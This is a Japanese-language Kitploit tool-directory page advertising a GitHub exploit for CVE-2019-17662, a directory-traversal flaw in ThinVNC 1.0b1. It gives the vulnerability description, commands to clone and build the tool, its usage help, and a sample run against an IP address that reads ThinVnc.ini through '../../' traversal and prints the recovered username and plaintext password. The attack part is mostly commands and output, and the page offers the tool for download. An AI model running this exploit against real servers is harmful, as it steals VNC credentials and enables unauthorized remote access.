Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/whokilleddb/cve-2019-17662
パスワード攻撃脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集
GitHubwhokilleddb/cve-2019-17662

CVE-2019-17662

CVE-2019-17662 (ThinVNC 1.0b1) のエクスプロイト

リポジトリを見る
224年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-17662

説明

ThinVNC 1.0b1 には任意のファイル読み取りの脆弱性があり、VNC サーバーの侵害につながります。この脆弱性は、VNC サーバーの導入時に認証が有効になっている場合でも存在します。認証用のパスワードは平文でファイルに保存されており、../../ThinVnc.ini ディレクトリトラバーサル攻撃ベクトルによって読み取ることができます。

~ NIST

エクスプロイトのコンパイル方法

root@kitploit:~
$ git clone https://github.com/whokilleddb/CVE-2019-17662
$ cd CVE-2019-17662
$ make

使用方法

root@kitploit:~
$ ./bin/CVE-2019-17662 -h
[~] Usage: ./CVE-2019-17662 -u URL [-f File]

[>] Options:
OPTIONS 	Desciption
-u URL 		Base URL
-f File 	[Optional] File Name To Query (Default: ThinVnc.ini)
root@kitploit:~
$ ./bin/CVE-2019-17662 -u http://10.10.185.214:8080/
[+] CVE-2019-17662 exploit by @whokilleddb
[o] Target : http://10.10.185.214:8080/
[x] File To Read: ThinVnc.ini
[~] Trying to Read: http://10.10.185.214:8080/abc/../../ThinVnc.ini
[:] Trying To Fetch Credentials
[-] User=Atlas
[-] Password=H0ldUpTheHe@vens
ツールをダウンロード